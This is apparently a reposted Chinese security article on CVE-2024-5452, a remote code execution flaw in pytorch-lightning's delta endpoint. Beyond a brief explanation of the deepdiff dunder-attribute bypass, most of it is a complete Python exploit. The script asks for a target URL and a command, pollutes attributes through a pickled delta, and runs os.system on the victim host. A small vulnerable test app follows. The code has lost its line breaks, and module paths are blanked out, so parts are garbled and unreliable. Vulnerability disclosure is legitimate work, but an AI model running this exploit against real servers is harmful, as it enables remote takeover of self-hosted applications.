CVE-2024-5452:严重的 PyTorch Lightning 漏洞导致 AI 模型遭受远程劫持

CVE-2024-5452:严重的 PyTorch Lightning 漏洞导致 AI 模型遭受远程劫持

由于lightning-ai/pytorch-lightning中的状态改变端点导致的属性 / 类污染导致的 RCE


此漏洞的根本原因是反序列化用户输入以及库未正确处理 dunder 属性deepdiff。pytorch-lightning使用deepdiff.Delta对象根据前端采取的操作更改应用程序状态。预期功能是仅允许修改特定状态变量。Deepdiff 还努力清理和保护其输入。deepdiff.Delta具有沙盒化 pickle 反序列化器,并且它们具有特定的有限白名单,可防止在那里执行代码。

它还努力防止 delta 更改 dunder 属性,但这可以通过引号绕过。因此,我们可以构造一个序列化的 delta,该 delta 通过反序列化器白名单并包含 dunder 属性。然后,在处理 delta 时,它可用于通过 dunder 属性访问其他模块、类和实例。

使用这种任意属性写入,可以操纵 pytorch-lightning 应用程序状态以获得完全 RCE。任何自托管的 pytorch-lightning 应用程序即使在其默认配置下也容易受到攻击,因为默认情况下启用了 delta 端点。


import requests, time, pickle, pickletoolsfrom collections import namedtuplefrom ordered_set import OrderedSet # The root cause of this vulnerability is allowing pickled data to be sent to the `api/v1/delta endpoint`# `deepdiff` also does not sanitize dunder paths properly, allowing for escalation to RCE via attribute pollution # Monkey patch OrderedSet reduce to make it easier to pickleOrderedSet.__reduce__ = lambda self, *args: (OrderedSet, ()) # Helper class to construct getitem and getattr paths easier# Also implements the bypass for `deepdiff` not allowing access to dunder attributes (adds quotes via `repr`)class Root:    def __init__(self, path=None):        self.path = path or []     def __getitem__(self, item):        return self.__class__(self.path + [('GET', repr(item))])     def __getattr__(self, attr):        return self.__class__(self.path + [('GETATTR', repr(attr) if attr.startswith('__') else attr)])        def __str__(self):        return ''.join(            ['root'] +             [                f'.{item}'                 if typ == 'GETATTR' else                 f'[{item}]'                 for typ, item in self.path            ]        )     def __reduce__(self, *args):        return str, (str(self),) server_host = ''server_host = input(f'LightingApp Root URL [{server_host}]: ') or server_hostcommand = input('Enter Command [id]: ') or 'id' def send_delta(d):    # this posts a delta to the remote host    # there is insufficent type checking on this endpoint to ensure serialized data is not sent accross + '/api/v1/delta', headers={        'x-lightning-type': '1',        'x-lightning-session-uuid': '1',        'x-lightning-session-id': '1'    }, json={"delta": d}) # this code is injected and ran on the remote hostinjected_code = f"__import__('os').system({command!r})" + '''import lightning, sysfrom import _DeltaRequest, = _DeltaRequestfrom import = Dictfrom import = LightningFlowLightningFlow._INTERNAL_STATE_VARS = {"_paths", "_layout"} = _APIRequestdel sys.modules['']''' root = Root() # This is why we add `namedtuple` to the root scope, it provides easy access to the `sys` modulesys = root['function'].__globals__['_sys']bypass_isinstance = OrderedSet delta = {    'attribute_added': {        # We use namedtuple to access modules (specifically sys) via its `__globals__`        root['function']: namedtuple,         # We need use to manipulate isinstance checks        root['bypass_isinstance']: bypass_isinstance,                # Setting `str` to `__instancecheck__` allows all isinstance calls on OrderedSet instances to return Truthy        root['bypass_isinstance'].__instancecheck__: str,         # We need our _DeltaRequest to be sent to the api request code path, so we change the imported type        # This causes the isinstance check to always fail        # affects: lightningapp/app/core/        sys.modules[''] str,         # We need to use get_component_by_name as a gadget to lookup our exec function, so we patch this to allow it to traverse normal dictionaries        # We also patch LightningFlow to bypass the ComponentTuple isinstance check        # We also patch out ComponentTuple incase it has already been imported        # affects: lightningapp/app/core/        sys.modules[''].structures.Dict: dict,        # Union needs to be stubbed out or it will complain about LightningFlow not being a type        sys.modules['typing'].Union: list,        sys.modules[''].core.LightningFlow: bypass_isinstance(),        sys.modules[''].utilities.types.ComponentTuple: bypass_isinstance(),         # We empty this variable to disable writes to internal state variables        # They will now cause unhandled exceptions due to LightningDict being `<class 'dict'>`        # affects: lightningapp/app/core/        sys.modules[''].core.flow.LightningFlow._INTERNAL_STATE_VARS: (),         # We need all isinstance checks against this type to succeed to place our payload in the vulnerable code path        # affects: lightningapp/app/utilities/commands/        sys.modules[''].utilities.commands.base._APIRequest: bypass_isinstance(),         # At this point, we set `name`, `method_name`, `args`, and `kwargs` on _DeltaRequest        # This allows us to lookup and call any object with controlled args and kwargs        # We can do this because our previous patches allow for the following:        # All _DeltaRequest deltas are now sent to the `_process_requests` function        # They are handled as _APIRequest objects and passed into `_process_api_request`        # This function first looks up a component via `root.get_component_by_name(`        # Due to our previous attribute modifications, this function now allows us to look up arbitrary objects        # It then looks up a method on the returned object (`getattr(flow, request.method_name)`)        # To end the chain, the method is called with the `args` and `kwargs` properties from the the `request` argument         # exec function lookup path        sys.modules[''] "root.__init__.__builtins__.exec",         # method name        sys.modules[''].api.request_types._DeltaRequest.method_name: "__call__",         # args        sys.modules[''].api.request_types._DeltaRequest.args: (injected_code,),         # kwargs        sys.modules[''].api.request_types._DeltaRequest.kwargs: {},         # We set `id` to avoid crashing after payload        sys.modules[''] "root"    }} # Some replaces to remove some odd quirks of pickle proto 1 # We keep proto 1 because it keeps our message utf-8 encodeablepayload = pickletools.optimize(pickle.dumps(delta, 1)).decode()     .replace('__builtin__', 'builtins')     .replace('unicode', 'str') # Sends the payload and does all of our attribute pollutionsend_delta(payload) # Small delay to ensure payload was processedtime.sleep(0.2)send_delta({}) # Code path triggers when this delta is recieved run app

from import LightningFlow, LightningApp class SimpleFlow(LightningFlow):    def run(self):        pass app = LightningApp(SimpleFlow())


CVE-2024-5452:严重的 PyTorch Lightning 漏洞导致 AI 模型遭受远程劫持


CVE-2024-5452:严重的 PyTorch Lightning 漏洞导致 AI 模型遭受远程劫持


CVE-2024-5452:严重的 PyTorch Lightning 漏洞导致 AI 模型遭受远程劫持


CVE-2024-5452:严重的 PyTorch Lightning 漏洞导致 AI 模型遭受远程劫持


CVE-2024-5452:严重的 PyTorch Lightning 漏洞导致 AI 模型遭受远程劫持


原文始发于微信公众号(Ots安全):CVE-2024-5452:严重的 PyTorch Lightning 漏洞导致 AI 模型遭受远程劫持

版权声明:admin 发表于 2024年6月11日 下午4:39。
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